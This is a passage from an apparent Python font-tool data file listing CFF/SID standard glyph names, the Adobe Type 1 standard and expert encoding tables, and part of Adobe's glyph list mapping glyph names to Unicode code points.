"Zcaron", "zcaron", "brokenbar", "Eth", "eth",
"Yacute", "yacute", "Thorn", "thorn", "minus",
# 240
"multiply", "onesuperior", "twosuperior", "threesuperior", "onehalf",
"onequarter", "threequarters", "franc", "Gbreve", "gbreve",
# 250
"Idotaccent", "Scedilla", "scedilla", "Cacute", "cacute",
"Ccaron", "ccaron", "dcroat"
]
# The list of standard `SID' glyph names. For the official list,
# see Annex A of document at
#
# http://partners.adobe.com/asn/developer/pdfs/tn/5176.CFF.pdf.
#
sid_standard_names = \
[
# 0
".notdef", "space", "exclam", "quotedbl", "numbersign",
"dollar", "percent", "ampersand", "quoteright", "parenleft",
# 10
"parenright", "asterisk", "plus", "comma", "hyphen",
"period", "slash", "zero", "one", "two",
# 20
"three", "four", "five", "six", "seven",
"eight", "nine", "colon", "semicolon", "less",
# 30
"equal", "greater", "question", "at", "A",
"B", "C", "D", "E", "F",
# 40
"G", "H", "I", "J", "K",
"L", "M", "N", "O", "P",
# 50
"Q", "R", "S", "T", "U",
"V", "W", "X", "Y", "Z",
# 60
"bracketleft", "backslash", "bracketright", "asciicircum", "underscore",
"quoteleft", "a", "b", "c", "d",
# 70
"e", "f", "g", "h", "i",
"j", "k", "l", "m", "n",
# 80
"o", "p", "q", "r", "s",
"t", "u", "v", "w", "x",
# 90
"y", "z", "braceleft", "bar", "braceright",
"asciitilde", "exclamdown", "cent", "sterling", "fraction",
# 100
"yen", "florin", "section", "currency", "quotesingle",
"quotedblleft", "guillemotleft", "guilsinglleft", "guilsinglright", "fi",
# 110
"fl", "endash", "dagger", "daggerdbl", "periodcentered",
"paragraph", "bullet", "quotesinglbase", "quotedblbase", "quotedblright",
# 120
"guillemotright", "ellipsis", "perthousand", "questiondown", "grave",
"acute", "circumflex", "tilde", "macron", "breve",
# 130
"dotaccent", "dieresis", "ring", "cedilla", "hungarumlaut",
"ogonek", "caron", "emdash", "AE", "ordfeminine",
# 140
"Lslash", "Oslash", "OE", "ordmasculine", "ae",
"dotlessi", "lslash", "oslash", "oe", "germandbls",
# 150
"onesuperior", "logicalnot", "mu", "trademark", "Eth",
"onehalf", "plusminus", "Thorn", "onequarter", "divide",
# 160
"brokenbar", "degree", "thorn", "threequarters", "twosuperior",
"registered", "minus", "eth", "multiply", "threesuperior",
# 170
"copyright", "Aacute", "Acircumflex", "Adieresis", "Agrave",
"Aring", "Atilde", "Ccedilla", "Eacute", "Ecircumflex",
# 180
"Edieresis", "Egrave", "Iacute", "Icircumflex", "Idieresis",
"Igrave", "Ntilde", "Oacute", "Ocircumflex", "Odieresis",
# 190
"Ograve", "Otilde", "Scaron", "Uacute", "Ucircumflex",
"Udieresis", "Ugrave", "Yacute", "Ydieresis", "Zcaron",
# 200
"aacute", "acircumflex", "adieresis", "agrave", "aring",
"atilde", "ccedilla", "eacute", "ecircumflex", "edieresis",
# 210
"egrave", "iacute", "icircumflex", "idieresis", "igrave",
"ntilde", "oacute", "ocircumflex", "odieresis", "ograve",
# 220
"otilde", "scaron", "uacute", "ucircumflex", "udieresis",
"ugrave", "yacute", "ydieresis", "zcaron", "exclamsmall",
# 230
"Hungarumlautsmall", "dollaroldstyle", "dollarsuperior", "ampersandsmall",
"Acutesmall",
"parenleftsuperior", "parenrightsuperior", "twodotenleader",
"onedotenleader", "zerooldstyle",
# 240
"oneoldstyle", "twooldstyle", "threeoldstyle", "fouroldstyle",
"fiveoldstyle",
"sixoldstyle", "sevenoldstyle", "eightoldstyle", "nineoldstyle",
"commasuperior",
# 250
"threequartersemdash", "periodsuperior", "questionsmall", "asuperior",
"bsuperior",
"centsuperior", "dsuperior", "esuperior", "isuperior", "lsuperior",
# 260
"msuperior", "nsuperior", "osuperior", "rsuperior", "ssuperior",
"tsuperior", "ff", "ffi", "ffl", "parenleftinferior",
# 270
"parenrightinferior", "Circumflexsmall", "hyphensuperior", "Gravesmall",
"Asmall",
"Bsmall", "Csmall", "Dsmall", "Esmall", "Fsmall",
# 280
"Gsmall", "Hsmall", "Ismall", "Jsmall", "Ksmall",
"Lsmall", "Msmall", "Nsmall", "Osmall", "Psmall",
# 290
"Qsmall", "Rsmall", "Ssmall", "Tsmall", "Usmall",
"Vsmall", "Wsmall", "Xsmall", "Ysmall", "Zsmall",
# 300
"colonmonetary", "onefitted", "rupiah", "Tildesmall", "exclamdownsmall",
"centoldstyle", "Lslashsmall", "Scaronsmall", "Zcaronsmall",
"Dieresissmall",
# 310
"Brevesmall", "Caronsmall", "Dotaccentsmall", "Macronsmall", "figuredash",
"hypheninferior", "Ogoneksmall", "Ringsmall", "Cedillasmall",
"questiondownsmall",
# 320
"oneeighth", "threeeighths", "fiveeighths", "seveneighths", "onethird",
"twothirds", "zerosuperior", "foursuperior", "fivesuperior",
"sixsuperior",
# 330
"sevensuperior", "eightsuperior", "ninesuperior", "zeroinferior",
"oneinferior",
"twoinferior", "threeinferior", "fourinferior", "fiveinferior",
"sixinferior",
# 340
"seveninferior", "eightinferior", "nineinferior", "centinferior",
"dollarinferior",
"periodinferior", "commainferior", "Agravesmall", "Aacutesmall",
"Acircumflexsmall",
# 350
"Atildesmall", "Adieresissmall", "Aringsmall", "AEsmall", "Ccedillasmall",
"Egravesmall", "Eacutesmall", "Ecircumflexsmall", "Edieresissmall",
"Igravesmall",
# 360
"Iacutesmall", "Icircumflexsmall", "Idieresissmall", "Ethsmall",
"Ntildesmall",
"Ogravesmall", "Oacutesmall", "Ocircumflexsmall", "Otildesmall",
"Odieresissmall",
# 370
"OEsmall", "Oslashsmall", "Ugravesmall", "Uacutesmall",
"Ucircumflexsmall",
"Udieresissmall", "Yacutesmall", "Thornsmall", "Ydieresissmall",
"001.000",
# 380
"001.001", "001.002", "001.003", "Black", "Bold",
"Book", "Light", "Medium", "Regular", "Roman",
# 390
"Semibold"
]
# This table maps character codes of the Adobe Standard Type 1
# encoding to glyph indices in the sid_standard_names table.
#
t1_standard_encoding = \
[
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 2, 3, 4, 5, 6, 7, 8,
9, 10, 11, 12, 13, 14, 15, 16, 17, 18,
19, 20, 21, 22, 23, 24, 25, 26, 27, 28,
29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40, 41, 42, 43, 44, 45, 46, 47, 48,
49, 50, 51, 52, 53, 54, 55, 56, 57, 58,
59, 60, 61, 62, 63, 64, 65, 66, 67, 68,
69, 70, 71, 72, 73, 74, 75, 76, 77, 78,
79, 80, 81, 82, 83, 84, 85, 86, 87, 88,
89, 90, 91, 92, 93, 94, 95, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 96, 97, 98, 99, 100, 101, 102, 103, 104,
105, 106, 107, 108, 109, 110, 0, 111, 112, 113,
114, 0, 115, 116, 117, 118, 119, 120, 121, 122,
0, 123, 0, 124, 125, 126, 127, 128, 129, 130,
131, 0, 132, 133, 0, 134, 135, 136, 137, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 138, 0, 139, 0, 0,
0, 0, 140, 141, 142, 143, 0, 0, 0, 0,
0, 144, 0, 0, 0, 145, 0, 0, 146, 147,
148, 149, 0, 0, 0, 0
]
# This table maps character codes of the Adobe Expert Type 1
# encoding to glyph indices in the sid_standard_names table.
#
t1_expert_encoding = \
[
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 229, 230, 0, 231, 232, 233, 234,
235, 236, 237, 238, 13, 14, 15, 99, 239, 240,
241, 242, 243, 244, 245, 246, 247, 248, 27, 28,
249, 250, 251, 252, 0, 253, 254, 255, 256, 257,
0, 0, 0, 258, 0, 0, 259, 260, 261, 262,
0, 0, 263, 264, 265, 0, 266, 109, 110, 267,
268, 269, 0, 270, 271, 272, 273, 274, 275, 276,
277, 278, 279, 280, 281, 282, 283, 284, 285, 286,
287, 288, 289, 290, 291, 292, 293, 294, 295, 296,
297, 298, 299, 300, 301, 302, 303, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 304, 305, 306, 0, 0, 307, 308, 309, 310,
311, 0, 312, 0, 0, 313, 0, 0, 314, 315,
0, 0, 316, 317, 318, 0, 0, 0, 158, 155,
163, 319, 320, 321, 322, 323, 324, 325, 0, 0,
326, 150, 164, 169, 327, 328, 329, 330, 331, 332,
333, 334, 335, 336, 337, 338, 339, 340, 341, 342,
343, 344, 345, 346, 347, 348, 349, 350, 351, 352,
353, 354, 355, 356, 357, 358, 359, 360, 361, 362,
363, 364, 365, 366, 367, 368, 369, 370, 371, 372,
373, 374, 375, 376, 377, 378
]
# This data has been taken literally from the file `glyphlist.txt',
# version 2.0, 22 Sept 2002. It is available from
#
# http://partners.adobe.com/asn/developer/typeforum/unicodegn.html
# http://partners.adobe.com/public/developer/en/opentype/glyphlist.txt
#
adobe_glyph_list = """\
A;0041
AE;00C6
AEacute;01FC
AEmacron;01E2
AEsmall;F7E6
Aacute;00C1
Aacutesmall;F7E1
Abreve;0102
Abreveacute;1EAE
Abrevecyrillic;04D0
Abrevedotbelow;1EB6
Abrevegrave;1EB0
Abrevehookabove;1EB2
Abrevetilde;1EB4
Acaron;01CD
Acircle;24B6
Acircumflex;00C2
Acircumflexacute;1EA4
Acircumflexdotbelow;1EAC
Acircumflexgrave;1EA6
Acircumflexhookabove;1EA8
Acircumflexsmall;F7E2
Acircumflextilde;1EAA
Acute;F6C9
Acutesmall;F7B4
Acyrillic;0410
Adblgrave;0200
Adieresis;00C4
Adieresiscyrillic;04D2
Adieresismacron;01DE
Adieresissmall;F7E4
Adotbelow;1EA0
Adotmacron;01E0
Agrave;00C0
Agravesmall;F7E0
Ahookabove;1EA2
Aiecyrillic;04D4
Ainvertedbreve;0202
Alpha;0391
Alphatonos;0386
Amacron;0100
Amonospace;FF21
Aogonek;0104
Aring;00C5
Aringacute;01FA
Aringbelow;1E00
Aringsmall;F7E5
Asmall;F761
Atilde;00C3
Atildesmall;F7E3
Aybarmenian;0531
B;0042
Bcircle;24B7
Bdotaccent;1E02
Bdotbelow;1E04
Becyrillic;0411
Benarmenian;0532
Beta;0392
Bhook;0181
Blinebelow;1E06
Bmonospace;FF22
Brevesmall;F6F4
Bsmall;F762
Btopbar;0182
C;0043
Caarmenian;053E
Cacute;0106
Caron;F6CA
Caronsmall;F6F5
Ccaron;010C
Ccedilla;00C7
Ccedillaacute;1E08
Ccedillasmall;F7E7
Ccircle;24B8
Ccircumflex;0108
Cdot;010A
Cdotaccent;010A
Cedillasmall;F7B8
Chaarmenian;0549
Cheabkhasiancyrillic;04BC
Checyrillic;0427
Chedescenderabkhasiancyrillic;04BE
Chedescendercyrillic;04B6
Chedieresiscyrillic;04F4
Cheharmenian;0543
Chekhakassiancyrillic;04CB
Cheverticalstrokecyrillic;04B8
Chi;03A7
Chook;0187
Circumflexsmall;F6F6
Cmonospace;FF23
Coarmenian;0551
Csmall;F763
D;0044
DZ;01F1
DZcaron;01C4
Daarmenian;0534
Dafrican;0189
Dcaron;010E
Dcedilla;1E10
Dcircle;24B9
Dcircumflexbelow;1E12
Dcroat;0110
Ddotaccent;1E0A
Ddotbelow;1E0C
Decyrillic;0414
Deicoptic;03EE
Delta;2206
Deltagreek;0394
Dhook;018A
Dieresis;F6CB
DieresisAcute;F6CC
DieresisGrave;F6CD
Dieresissmall;F7A8
Digammagreek;03DC
Djecyrillic;0402
Dlinebelow;1E0E
Dmonospace;FF24
Dotaccentsmall;F6F7
Dslash;0110
Dsmall;F764
Dtopbar;018B
Dz;01F2
Dzcaron;01C5
Dzeabkhasiancyrillic;04E0
Dzecyrillic;0405
Dzhecyrillic;040F
E;0045
Eacute;00C9
Eacutesmall;F7E9
Ebreve;0114
Ecaron;011A
Ecedillabreve;1E1C
Echarmenian;0535
Ecircle;24BA
Ecircumflex;00CA
Ecircumflexacute;1EBE
Ecircumflexbelow;1E18
Ecircumflexdotbelow;1EC6
Ecircumflexgrave;1EC0
Ecircumflexhookabove;1EC2
Ecircumflexsmall;F7EA
Ecircumflextilde;1EC4
Ecyrillic;0404
Edblgrave;0204
Edieresis;00CB
Edieresissmall;F7EB
Edot;0116
Edotaccent;0116
Edotbelow;1EB8
Efcyrillic;0424
Egrave;00C8
Egravesmall;F7E8
Eharmenian;0537
Ehookabove;1EBA
Eightroman;2167
Einvertedbreve;0206
Eiotifiedcyrillic;0464
Elcyrillic;041B
Elevenroman;216A
Emacron;0112
Emacronacute;1E16
Emacrongrave;1E14
Emcyrillic;041C
Emonospace;FF25
Encyrillic;041D
Endescendercyrillic;04A2
Eng;014A
Enghecyrillic;04A4
Enhookcyrillic;04C7
Eogonek;0118
Eopen;0190
Epsilon;0395
Epsilontonos;0388
Ercyrillic;0420
Ereversed;018E
Ereversedcyrillic;042D
Escyrillic;0421
Esdescendercyrillic;04AA
Esh;01A9
Esmall;F765
Eta;0397
Etarmenian;0538
Etatonos;0389
Eth;00D0
Ethsmall;F7F0
Etilde;1EBC
Etildebelow;1E1A
Euro;20AC
Ezh;01B7
Ezhcaron;01EE
Ezhreversed;01B8
F;0046
Fcircle;24BB
Fdotaccent;1E1E
Feharmenian;0556
Feicoptic;03E4
Fhook;0191
Fitacyrillic;0472
Fiveroman;2164
Fmonospace;FF26
Fourroman;2163
Fsmall;F766
G;0047
GBsquare;3387
Gacute;01F4
Gamma;0393
Gammaafrican;0194
Gangiacoptic;03EA
Gbreve;011E
Gcaron;01E6
Gcedilla;0122
Gcircle;24BC
Gcircumflex;011C
Gcommaaccent;0122
Gdot;0120
Gdotaccent;0120
Gecyrillic;0413
Ghadarmenian;0542
Ghemiddlehookcyrillic;0494
Ghestrokecyrillic;0492
Gheupturncyrillic;0490
Ghook;0193
Gimarmenian;0533
Gjecyrillic;0403
Gmacron;1E20
Gmonospace;FF27
Grave;F6CE
Gravesmall;F760
Gsmall;F767
Gsmallhook;029B
Gstroke;01E4
H;0048
H18533;25CF
H18543;25AA
H18551;25AB
H22073;25A1
HPsquare;33CB
Haabkhasiancyrillic;04A8
Hadescendercyrillic;04B2
Hardsigncyrillic;042A
Hbar;0126
Hbrevebelow;1E2A
Hcedilla;1E28
Hcircle;24BD
Hcircumflex;0124
Hdieresis;1E26
Hdotaccent;1E22
Hdotbelow;1E24
Hmonospace;FF28
Hoarmenian;0540
Horicoptic;03E8
Hsmall;F768
Hungarumlaut;F6CF
Hungarumlautsmall;F6F8
Hzsquare;3390
I;0049
IAcyrillic;042F
IJ;0132
IUcyrillic;042E
Iacute;00CD
Iacutesmall;F7ED
Ibreve;012C
Icaron;01CF
Icircle;24BE
Icircumflex;00CE
Icircumflexsmall;F7EE
Icyrillic;0406
Idblgrave;0208
Idieresis;00CF
Idieresisacute;1E2E
Idieresiscyrillic;04E4
Idieresissmall;F7EF
Idot;0130
Idotaccent;0130
Idotbelow;1ECA
Iebrevecyrillic;04D6
Iecyrillic;0415
Ifraktur;2111
Igrave;00CC
Igravesmall;F7EC
Ihookabove;1EC8
Iicyrillic;0418
Iinvertedbreve;020A
Iishortcyrillic;0419
Imacron;012A
Imacroncyrillic;04E2
Imonospace;FF29
Iniarmenian;053B
Iocyrillic;0401
Iogonek;012E
Iota;0399
Iotaafrican;0196
Iotadieresis;03AA
Iotatonos;038A
Ismall;F769
Istroke;0197
Itilde;0128
Itildebelow;1E2C
Izhitsacyrillic;0474
Izhitsadblgravecyrillic;0476
J;004A
Jaarmenian;0541
Jcircle;24BF
Jcircumflex;0134
Jecyrillic;0408
Jheharmenian;054B
Jmonospace;FF2A
Jsmall;F76A
K;004B
KBsquare;3385
KKsquare;33CD
Kabashkircyrillic;04A0
Kacute;1E30
Kacyrillic;041A
Kadescendercyrillic;049A
Kahookcyrillic;04C3
Kappa;039A
Kastrokecyrillic;049E
Kaverticalstrokecyrillic;049C
Kcaron;01E8
Kcedilla;0136
Kcircle;24C0
Kcommaaccent;0136
Kdotbelow;1E32
Keharmenian;0554
Kenarmenian;053F
Khacyrillic;0425
Kheicoptic;03E6
Khook;0198
Kjecyrillic;040C
Klinebelow;1E34
Kmonospace;FF2B
Koppacyrillic;0480
Koppagreek;03DE
Ksicyrillic;046E
Ksmall;F76B
L;004C
LJ;01C7
LL;F6BF
Lacute;0139
Lambda;039B
Lcaron;013D
Lcedilla;013B
Lcircle;24C1
Lcircumflexbelow;1E3C
Lcommaaccent;013B
Ldot;013F
Ldotaccent;013F
Ldotbelow;1E36
Ldotbelowmacron;1E38
Liwnarmenian;053C
Lj;01C8
Ljecyrillic;0409
Llinebelow;1E3A
Lmonospace;FF2C
Lslash;0141
Lslashsmall;F6F9
Lsmall;F76C
M;004D
MBsquare;3386
Macron;F6D0
Macronsmall;F7AF
Macute;1E3E
Mcircle;24C2
Mdotaccent;1E40
Mdotbelow;1E42
Menarmenian;0544
Mmonospace;FF2D
Msmall;F76D
Mturned;019C
Mu;039C
N;004E
NJ;01CA
Nacute;0143
Ncaron;0147
Ncedilla;0145
Ncircle;24C3
Ncircumflexbelow;1E4A
Ncommaaccent;0145
Ndotaccent;1E44
Ndotbelow;1E46
Nhookleft;019D
Nineroman;2168
Nj;01CB
Njecyrillic;040A
Nlinebelow;1E48
Nmonospace;FF2E
Nowarmenian;0546
Nsmall;F76E
Ntilde;00D1
Ntildesmall;F7F1
Nu;039D
O;004F
OE;0152
OEsmall;F6FA
Oacute;00D3
Oacutesmall;F7F3
Obarredcyrillic;04E8
Obarreddieresiscyrillic;04EA
Obreve;014E
Ocaron;01D1
Ocenteredtilde;019F
Ocircle;24C4
Ocircumflex;00D4
Ocircumflexacute;1ED0
Ocircumflexdotbelow;1ED8
Ocircumflexgrave;1ED2
Ocircumflexhookabove;1ED4
Ocircumflexsmall;F7F4
Ocircumflextilde;1ED6
Ocyrillic;041E
Odblacute;0150
Odblgrave;020C
Odieresis;00D6
Odieresiscyrillic;04E6
Odieresissmall;F7F6
Odotbelow;1ECC
Ogoneksmall;F6FB
Ograve;00D2
Ogravesmall;F7F2
Oharmenian;0555
Ohm;2126
Ohookabove;1ECE
Ohorn;01A0
Ohornacute;1EDA
Ohorndotbelow;1EE2
Ohorngrave;1EDC
Ohornhookabove;1EDE
Ohorntilde;1EE0
Ohungarumlaut;0150
Oi;01A2
Oinvertedbreve;020E
Omacron;014C
Omacronacute;1E52
Omacrongrave;1E50
Omega;2126
Omegacyrillic;0460
Omegagreek;03A9
Omegaroundcyrillic;047A
Omegatitlocyrillic;047C
Omegatonos;038F
Omicron;039F
Omicrontonos;038C
Omonospace;FF2F
Oneroman;2160
Oogonek;01EA
Oogonekmacron;01EC
Oopen;0186
Oslash;00D8
Oslashacute;01FE
Oslashsmall;F7F8
Osmall;F76F
Ostrokeacute;01FE
Otcyrillic;047E
Otilde;00D5
Otildeacute;1E4C
Otildedieresis;1E4E
Otildesmall;F7F5
P;0050
Pacute;1E54
Pcircle;24C5
Pdotaccent;1E56
Pecyrillic;041F
Peharmenian;054A
Pemiddlehookcyrillic;04A6
Phi;03A6
Phook;01A4
Pi;03A0
Piwrarmenian;0553
Pmonospace;FF30
Psi;03A8
Psicyrillic;0470
Psmall;F770
Q;0051
Qcircle;24C6
Qmonospace;FF31
Qsmall;F771
R;0052
Raarmenian;054C
Racute;0154
Rcaron;0158
Rcedilla;0156
Rcircle;24C7
Rcommaaccent;0156
Rdblgrave;0210
Rdotaccent;1E58
Rdotbelow;1E5A
Rdotbelowmacron;1E5C
Reharmenian;0550
Rfraktur;211C
Rho;03A1
Ringsmall;F6FC
Rinvertedbreve;0212
Rlinebelow;1E5E
Rmonospace;FF32
Rsmall;F772
Rsmallinverted;0281
Rsmallinvertedsuperior;02B6
S;0053
SF010000;250C
SF020000;2514
SF030000;2510
SF040000;2518
SF050000;253C
SF060000;252C
SF070000;2534
SF080000;251C
SF090000;2524
SF100000;2500
SF110000;2502
SF190000;2561
SF200000;2562
SF210000;2556
SF220000;2555
SF230000;2563
SF240000;2551
SF250000;2557
SF260000;255D
SF270000;255C
SF280000;255B
SF360000;255E
SF370000;255F
SF380000;255A
SF390000;2554
SF400000;2569
SF410000;2566
SF420000;2560
SF430000;2550
SF440000;256C
SF450000;2567
SF460000;2568
SF470000;2564
SF480000;2565
SF490000;2559
SF500000;2558
SF510000;2552
SF520000;2553
SF530000;256B
SF540000;256A
Sacute;015A
Sacutedotaccent;1E64
Sampigreek;03E0
Scaron;0160
Scarondotaccent;1E66
Scaronsmall;F6FD
Scedilla;015E
Schwa;018F
Schwacyrillic;04D8
Schwadieresiscyrillic;04DA
Scircle;24C8
Scircumflex;015C
Scommaaccent;0218
Sdotaccent;1E60
Sdotbelow;1E62
Sdotbelowdotaccent;1E68
Seharmenian;054D
Sevenroman;2166
Shaarmenian;0547
Shacyrillic;0428
Shchacyrillic;0429
Sheicoptic;03E2
Shhacyrillic;04BA
Shimacoptic;03EC
Sigma;03A3
Sixroman;2165
Smonospace;FF33
Softsigncyrillic;042C
Ssmall;F773
Stigmagreek;03DA
T;0054
Tau;03A4
Tbar;0166
Tcaron;0164
Tcedilla;0162
Tcircle;24C9
Tcircumflexbelow;1E70
Tcommaaccent;0162
Tdotaccent;1E6A
Tdotbelow;1E6C
Tecyrillic;0422
Tedescendercyrillic;04AC
Tenroman;2169
Tetsecyrillic;04B4
Theta;0398
Thook;01AC
Thorn;00DE
Thornsmall;F7FE
Threeroman;2162
Tildesmall;F6FE
Tiwnarmenian;054F
Tlinebelow;1E6E
Tmonospace;FF34
Toarmenian;0539
Tonefive;01BC
Tonesix;0184
Tonetwo;01A7
Tretroflexhook;01AE
Tsecyrillic;0426
Tshecyrillic;040B
Tsmall;F774
Twelveroman;216B
Tworoman;2161
U;0055
Uacute;00DA
Uacutesmall;F7FA
Ubreve;016C
Ucaron;01D3
Ucircle;24CA
Ucircumflex;00DB
Ucircumflexbelow;1E76
Ucircumflexsmall;F7FB
Ucyrillic;0423
Udblacute;0170
Udblgrave;0214
Udieresis;00DC
Udieresisacute;01D7
Udieresisbelow;1E72
Udieresiscaron;01D9
Udieresiscyrillic;04F0
Udieresisgrave;01DB
Udieresismacron;01D5
Udieresissmall;F7FC
Udotbelow;1EE4
Ugrave;00D9
Ugravesmall;F7F9
Uhookabove;1EE6
Uhorn;01AF
Uhornacute;1EE8
Uhorndotbelow;1EF0
Uhorngrave;1EEA
Uhornhookabove;1EEC
Uhorntilde;1EEE
Uhungarumlaut;0170
Uhungarumlautcyrillic;04F2
Uinvertedbreve;0216
Ukcyrillic;0478
Umacron;016A
Umacroncyrillic;04EE
Umacrondieresis;1E7A
Umonospace;FF35
Uogonek;0172
Upsilon;03A5
Upsilon1;03D2
Upsilonacutehooksymbolgreek;03D3
Upsilonafrican;01B1
Upsilondieresis;03AB
Upsilondieresishooksymbolgreek;03D4
Upsilonhooksymbol;03D2
Upsilontonos;038E
Uring;016E
Ushortcyrillic;040E
Usmall;F775
Ustraightcyrillic;04AE
Ustraightstrokecyrillic;04B0
Utilde;0168
Utildeacute;1E78
Utildebelow;1E74
V;0056
Vcircle;24CB
Vdotbelow;1E7E
Vecyrillic;0412
Vewarmenian;054E
Vhook;01B2
Vmonospace;FF36
Voarmenian;0548
Vsmall;F776
Vtilde;1E7C
W;0057
Wacute;1E82
Wcircle;24CC
Wcircumflex;0174
Wdieresis;1E84
Wdotaccent;1E86
Wdotbelow;1E88
Wgrave;1E80
Wmonospace;FF37
Wsmall;F777
X;0058
Xcircle;24CD
Xdieresis;1E8C
Xdotaccent;1E8A
Xeharmenian;053D
Xi;039E
Xmonospace;FF38
Xsmall;F778
Y;0059
Yacute;00DD
Yacutesmall;F7FD
Yatcyrillic;0462
Ycircle;24CE
Ycircumflex;0176
Ydieresis;0178
Ydieresissmall;F7FF
Ydotaccent;1E8E
Ydotbelow;1EF4
Yericyrillic;042B
Yerudieresiscyrillic;04F8
Ygrave;1EF2
Yhook;01B3
Yhookabove;1EF6
Yiarmenian;0545
Yicyrillic;0407
Yiwnarmenian;0552
Ymonospace;FF39
Ysmall;F779
Ytilde;1EF8
Yusbigcyrillic;046A
Yusbigiotifiedcyrillic;046C
Yuslittlecyrillic;0466
Yuslittleiotifiedcyrillic;0468
Z;005A
Zaarmenian;0536
Zacute;0179
Zcaron;017D
Zcaronsmall;F6FF
Zcircle;24CF
Zcircumflex;1E90
Zdot;017B
Zdotaccent;017B
Zdotbelow;1E92
Zecyrillic;0417
Zedescendercyrillic;0498
Zedieresiscyrillic;04DE
Zeta;0396
Zhearmenian;053A
Zhebrevecyrillic;04C1
Zhecyrillic;0416
Zhedescendercyrillic;0496
Zhedieresiscyrillic;04DC
Zlinebelow;1E94
Zmonospace;FF3A
Zsmall;F77A
Zstroke;01B5
a;0061
aabengali;0986
aacute;00E1
aadeva;0906
aagujarati;0A86
aagurmukhi;0A06
aamatragurmukhi;0A3E
aarusquare;3303
aavowelsignbengali;09BE
aavowelsigndeva;093E
aavowelsigngujarati;0ABE
abbreviationmarkarmenian;055F
abbreviationsigndeva;0970
abengali;0985
abopomofo;311A
abreve;0103
abreveacute;1EAF
abrevecyrillic;04D1
abrevedotbelow;1EB7
abrevegrave;1EB1
abrevehookabove;1EB3
abrevetilde;1EB5
acaron;01CE
acircle;24D0
acircumflex;00E2
acircumflexacute;1EA5
acircumflexdotbelow;1EAD
acircumflexgrave;1EA7
acircumflexhookabove;1EA9
acircumflextilde;1EAB
acute;00B4
acutebelowcmb;0317
acutecmb;0301
acutecomb;0301
acutedeva;0954
acutelowmod;02CF
acutetonecmb;0341
acyrillic;0430
adblgrave;0201
addakgurmukhi;0A71
adeva;0905
adieresis;00E4
adieresiscyrillic;04D3
adieresismacron;01DF
adotbelow;1EA1
adotmacron;01E1
ae;00E6
aeacute;01FD
aekorean;3150
aemacron;01E3
afii00208;2015
afii08941;20A4
afii10017;0410
afii10018;0411
afii10019;0412
afii10020;0413
afii10021;0414
afii10022;0415
afii10023;0401
afii10024;0416
afii10025;0417
afii10026;0418
afii10027;0419
afii10028;041A
afii10029;041B
afii10030;041C
afii10031;041D
afii10032;041E
afii10033;041F
afii10034;0420
afii10035;0421
afii10036;0422
afii10037;0423
afii10038;0424
afii10039;0425
afii10040;0426
afii10041;0427
afii10042;0428
afii10043;0429
afii10044;042A
afii10045;042B
afii10046;042C
afii10047;042D
afii10048;042E
afii10049;042F
afii10050;0490
afii10051;0402
afii10052;0403
afii10053;0404
afii10054;0405
afii10055;0406
afii10056;0407
afii10057;0408
afii10058;0409
afii10059;040A
afii10060;040B
afii10061;040C
afii10062;040E
afii10063;F6C4
afii10064;F6C5
afii10065;0430
afii10066;0431
afii10067;0432
afii10068;0433
afii10069;0434
afii10070;0435
afii10071;0451
afii10072;0436
afii10073;0437
afii10074;0438
afii10075;0439
afii10076;043A
afii10077;043B
afii10078;043C
afii10079;043D
afii10080;043E
afii10081;043F
afii10082;0440
afii10083;0441
afii10084;0442
afii10085;0443
afii10086;0444
afii10087;0445
afii10088;0446
afii10089;0447
afii10090;0448
afii10091;0449
afii10092;044A
afii10093;044B
afii10094;044C
afii10095;044D
afii10096;044E
afii10097;044F
afii10098;0491
afii10099;0452
afii10100;0453
afii10101;0454
afii10102;0455
afii10103;0456
afii10104;0457
afii10105;0458
afii10106;0459
afii10107;045A
afii10108;045B
afii10109;045C
afii10110;045E
afii10145;040F
afii10146;0462
afii10147;0472
afii10148;0474
afii10192;F6C6
afii10193;045F
afii10194;0463
afii10195;0473
afii10196;0475
afii10831;F6C7
afii10832;F6C8
afii10846;04D9
afii299;200E
afii300;200F
afii301;200D
afii57381;066A
afii57388;060C
afii57392;0660
afii57393;0661
afii57394;0662
afii57395;0663
afii57396;0664
afii57397;0665
afii57398;0666
afii57399;0667
afii57400;0668
afii57401;0669
afii57403;061B
afii57407;061F
afii57409;0621
afii57410;0622
afii57411;0623
afii57412;0624
afii57413;0625
afii57414;0626
afii57415;0627
afii57416;0628
afii57417;0629
afii57418;062A
afii57419;062B
afii57420;062C
afii57421;062D
afii57422;062E
afii57423;062F
afii57424;0630
afii57425;0631
afii57426;0632
afii57427;0633
afii57428;0634
afii57429;0635
afii57430;0636
afii57431;0637
afii57432;0638
afii57433;0639
afii57434;063A
afii57440;0640
afii57441;0641
afii57442;0642
afii57443;0643
afii57444;0644
afii57445;0645
afii57446;0646
afii57448;0648
afii57449;0649
afii57450;064A
afii57451;064B
afii57452;064C
afii57453;064D
afii57454;064E
afii57455;064F
afii57456;0650
afii57457;0651
afii57458;0652
afii57470;0647
afii57505;06A4
afii57506;067E
afii57507;0686
afii57508;0698
afii57509;06AF
afii57511;0679
afii57512;0688
afii57513;0691
afii57514;06BA
afii57519;06D2
afii57534;06D5
afii57636;20AA
afii57645;05BE
afii57658;05C3
afii57664;05D0
afii57665;05D1
afii57666;05D2
afii57667;05D3
afii57668;05D4
afii57669;05D5
afii57670;05D6
afii57671;05D7
afii57672;05D8
afii57673;05D9
afii57674;05DA
afii57675;05DB
afii57676;05DC
afii57677;05DD
afii57678;05DE
afii57679;05DF
afii57680;05E0
afii57681;05E1
afii57682;05E2
afii57683;05E3
afii57684;05E4
afii57685;05E5
afii57686;05E6
afii57687;05E7
afii57688;05E8
afii57689;05E9
afii57690;05EA
afii57694;FB2A
afii57695;FB2B
afii57700;FB4B
afii57705;FB1F
afii57716;05F0
